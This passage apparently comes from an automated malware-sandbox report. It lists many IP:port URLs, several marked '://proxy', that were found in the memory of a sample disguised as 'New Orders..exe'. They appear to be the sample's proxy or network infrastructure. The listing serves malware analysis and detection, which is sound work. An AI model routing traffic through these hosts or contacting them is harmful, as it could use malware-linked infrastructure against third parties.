                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29A3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.214.232://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.214.232:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.217.159
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.217.159://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://156.67.217.159:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266F1000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.56.40:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.56.40:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.6.202:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.6.202:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254C6000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.63.69:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.100.63.69:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.159.10.86
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.159.10.86://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.159.10.86:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.245.131.28:30422
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.245.131.28:30422://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.25.92.74:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://157.25.92.74:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.101.113.18
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.101.113.18://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.101.113.18:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259CB000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.247.207.153:3030
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://158.247.207.153:3030://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.112.141.44:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.112.141.44:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.102.249:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.102.249:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.138
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.138.170:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.192.138.170:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.104.153:8200
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.104.153:8200://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.61.169:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.61.169:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:1372
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:1372://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:21898
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:21898://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:25154
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:25154://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:5078
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.166.21:5078://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:51616
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:51616://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:52542://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:56581
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:56581://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:59098
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:59098://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:59243
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:59243://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:61818
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.223.71.71:61818://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.77.168:8585
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.65.77.168:8585://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.75.49.140:10808
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.75.49.140:10808://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.194.121:16075
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.89.194.121:16075://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.119.128.66:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.119.128.66:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.119.148.190:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.119.148.190:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2839C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:31745
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:31745://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:35138
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:35138://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:38586
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:38586://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD299E6000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD299ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:59786
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD299C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:59786://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:6116
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.153.245.187:6116://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.16.90.35:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.16.90.35:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.19.169.208:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.19.169.208:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2978D000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:2525
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:2525://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2518E000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:587
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:587://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD299A6000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.248.80.91:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.3.168.7
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.3.168.70:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://160.3.168.70:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.156.199.78
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.156.199.78://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.156.199.78:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.202.226.194:8123
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.34.67.8
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.34.67.83:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.34.67.83:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.35.88.210:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.35.88.210:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.49.90.7
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.49.90.70:1337
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.49.90.70:1337://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.49.91.13:1337
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.49.91.13:1337://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.132.227:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.132.227:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:12762
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:12762://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:2838
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.147.193:2838://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:1798
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:1798://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:30189
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:30189://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:34586
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:34586://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:34916
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:34916://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:55109
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:55109://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:64120
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:64120://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:9045
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.163.52:9045://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.170.209:62291
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.170.209:62291://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:50386
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:50386://proxyP
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:62289
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.42:62289://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2541D000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD253FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.78:26552
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25408000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.78:26552://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.78:49145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.173.78:49145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.74.176:30000
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://161.97.74.176:30000://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.120.71.11
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.120.71.11://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.120.71.11:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.121.232
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.121.232:16795
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.144.121.232:16795://proxy
